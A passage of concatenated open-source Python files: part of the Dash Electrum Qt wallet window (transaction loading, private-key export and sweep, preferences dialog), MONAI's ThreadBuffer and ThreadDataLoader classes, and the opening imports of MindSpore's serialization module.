file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Dash Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_dash import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-dash-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Dash Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
tabs.setObjectName("settings_tab")
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum_dash.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', False)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 DASH = 1000 mDASH. 1 mDASH = 1000 uDASH. 1 uDASH = 100 duffs.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
show_dip2_cb = QCheckBox(_('Show DIP2 tx type in wallet history:'))
show_dip2_cb.setChecked(self.config.get('show_dip2_tx_type', False))
def on_dip2_state_changed(x):
show_dip2 = (x == Qt.Checked)
self.config.set_key('show_dip2_tx_type', show_dip2, True)
self.history_model.refresh('on_dip2')
show_dip2_cb.stateChanged.connect(on_dip2_state_changed)
gui_widgets.append((show_dip2_cb, None))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum_dash import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 duffs might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Dash Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.wallet.protx_manager.clean_up()
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Dash Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_masternode_dialog(self):
d = MasternodeDialog(self.masternode_manager, self)
d.exec_()
def proposals_changed(self):
"""Callback for when proposals change."""
if not self.masternode_manager:
return
self.update_proposals_tab()
|
thread_buffer.py
|
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from queue import Empty, Full, Queue
from threading import Thread
from monai.data import DataLoader, Dataset
class ThreadBuffer:
"""
Iterates over values from self.src in a separate thread but yielding them in the current thread. This allows values
to be queued up asynchronously. The internal thread will continue running so long as the source has values or until
the stop() method is called.
One issue raised by using a thread in this way is that during the lifetime of the thread the source object is being
iterated over, so if the thread hasn't finished another attempt to iterate over it will raise an exception or yield
unexpected results. To ensure the thread releases the iteration and proper cleanup is done the stop() method must
be called which will join with the thread.
Args:
src: Source data iterable
buffer_size: Number of items to buffer from the source
timeout: Time to wait for an item from the buffer, or to wait while the buffer is full when adding items
"""
def __init__(self, src, buffer_size: int = 1, timeout: float = 0.01):
self.src = src
self.buffer_size = buffer_size
self.timeout = timeout
self.buffer: Queue = Queue(self.buffer_size)
self.gen_thread = None
self.is_running = False
def enqueue_values(self):
for src_val in self.src:
while self.is_running:
try:
self.buffer.put(src_val, timeout=self.timeout)
except Full:
pass # try to add the item again
else:
break # successfully added the item, quit trying
else: # quit the thread cleanly when requested to stop
break
def stop(self):
self.is_running = False # signal the thread to exit
if self.gen_thread is not None:
self.gen_thread.join()
self.gen_thread = None
def __iter__(self):
self.is_running = True
self.gen_thread = Thread(target=self.enqueue_values, daemon=True)
self.gen_thread.start()
try:
while self.is_running and (self.gen_thread.is_alive() or not self.buffer.empty()):
try:
yield self.buffer.get(timeout=self.timeout)
except Empty:
pass # queue was empty this time, try again
finally:
self.stop() # ensure thread completion
class ThreadDataLoader(DataLoader):
"""
Subclass of `DataLoader` using a `ThreadBuffer` object to implement `__iter__` method asynchronously. This will
iterate over data from the loader as expected however the data is generated on a separate thread. Use this class
where a `DataLoader` instance is required and not just an iterable object.
The default behaviour with `repeats` set to 1 is to yield each batch as it is generated, however with a higher
value the generated batch is yielded that many times while underlying dataset asynchronously generates the next.
Typically not all relevant information is learned from a batch in a single iteration so training multiple times
on the same batch will still produce good training with minimal short-term overfitting while allowing a slow batch
generation process more time to produce a result.
See:
* Fischetti et al. "Faster SGD training by minibatch persistency." ArXiv (2018) https://arxiv.org/abs/1806.07353
* Dami et al., "Faster Neural Network Training with Data Echoing" ArXiv (2020) https://arxiv.org/abs/1907.05550
* Ramezani et al. "GCN meets GPU: Decoupling "When to Sample" from "How to Sample"." NeurIPS (2020).
https://proceedings.neurips.cc/paper/2020/file/d714d2c5a796d5814c565d78dd16188d-Paper.pdf
Args:
dataset: input dataset.
buffer_size: number of items to buffer from the data source.
buffer_timeout: time to wait for an item from the buffer, or to wait while the buffer is full when adding items.
num_workers: number of the multi-processing workers in PyTorch DataLoader.
repeats: number of times to yield the same batch
"""
def __init__(
self,
dataset: Dataset,
buffer_size: int = 1,
buffer_timeout: float = 0.01,
num_workers: int = 0,
repeats: int = 1,
**kwargs,
):
super().__init__(dataset, num_workers, **kwargs)
self.buffer_size = buffer_size
self.buffer_timeout = buffer_timeout
self.repeats = repeats
def __iter__(self):
buffer = ThreadBuffer(src=super().__iter__(), buffer_size=self.buffer_size, timeout=self.buffer_timeout)
for batch in buffer:
for _ in range(self.repeats):
yield batch
|
serialization.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Model and parameters serialization."""
import os
import sys
import stat
import math
import shutil
from threading import Thread, Lock
import numpy as np
import mindspore.nn as nn
import mindspore.context as context
from mindspore import log as logger
from mindspore.train.checkpoint_pb2 import Checkpoint
from mindspore.train.print_pb2 import Print
from mindspore.train.node_strategy_pb2 import ParallelStrategyMap, ParallelLayouts
from mindspore.train.mind_ir_pb2 import ModelProto as mindir_model
from mindspore.train.mind_ir_pb2 import GraphProto as graph_proto
from mindspore.common.tensor import Tensor
from mindspore.common.initializer import initializer
from mindspore.common.parameter import Parameter
from mindspore.common.api import _executor
from mindspore.common import dtype as mstype
from mindspore._checkparam import check_input_data, Validator
from mindspore.compression.export import quant_export
from mindspore.parallel._tensor import _load_tensor
from mindspore.parallel._utils import _infer_rank_list, _remove_repeated_slices
from .._c_expression import load_mindir
tensor_to_ms_type = {"Int8": mstype.int8, "Uint8": mstype.uint8, "Int16": mstype.int16, "Uint16": mstype.uint16,
